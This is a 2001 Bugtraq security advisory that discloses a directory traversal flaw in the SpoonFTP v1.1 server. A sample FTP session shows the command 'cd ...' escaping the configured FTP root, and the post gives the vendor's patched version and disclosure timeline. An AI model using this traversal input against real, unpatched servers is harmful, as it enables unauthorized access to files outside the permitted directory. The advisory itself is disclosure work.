Bugtraq mailing list archives
Vulnerability in SpoonFTP
From: joetesta () hushmail com
Date: Thu, 20 Sep 2001 09:31:12 -0700
-----BEGIN PGP SIGNED MESSAGE-----
Vulnerability in SpoonFTP
Overview
SpoonFTP v1.1 is an ftp server available from http://www.pi-soft.com/.
A vulnerability exists which allows a remote user to break out of the ftp root.
Details
The following excerpt demonstrates the problem; an ftp root of 'D:\root\root\' was
used:
ftp localhost
Connected to xxxxxxxx.rh.rit.edu.
220 SpoonFTP V1.1
User (xxxxxxxx.rh.rit.edu:(none)): jdog
331 Password required.
Password:
230 User logged in, proceed.
ftp> pwd
257 "/" is current directory.
ftp> cd ...
250 CWD command successful.
ftp> pwd
257 "/..." is current directory.
ftp>
Solution
Upgrade to V1.1.0.1 at: http://www.pi-soft.com/spoonftp/sftp.exe
Vendor Status
Pi-Soft Consulting, LLC was contacted via <support () pi-soft com> on Tuesday,
September 18, 2001. This vulnerability was fixed in a matter of hours.
- Joe Testa
e-mail: joetesta () hushmail com
web page: http://hogs.rit.edu/~joet/
AIM: LordSpankatron
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.0
wl0EARECAB0FAjuqRIsWHGpvZXRlc3RhQGh1c2htYWlsLmNvbQAKCRA/wHT6vruBNBjk
AJ99Iu7Ntbv4M1lYS3KZOEyNkK4a7QCeIromIWdZdj2Wc5qySXbKLHZZlmk=
=hK2i
-----END PGP SIGNATURE-----
Current thread:
- Vulnerability in SpoonFTP joetesta (Sep 20)
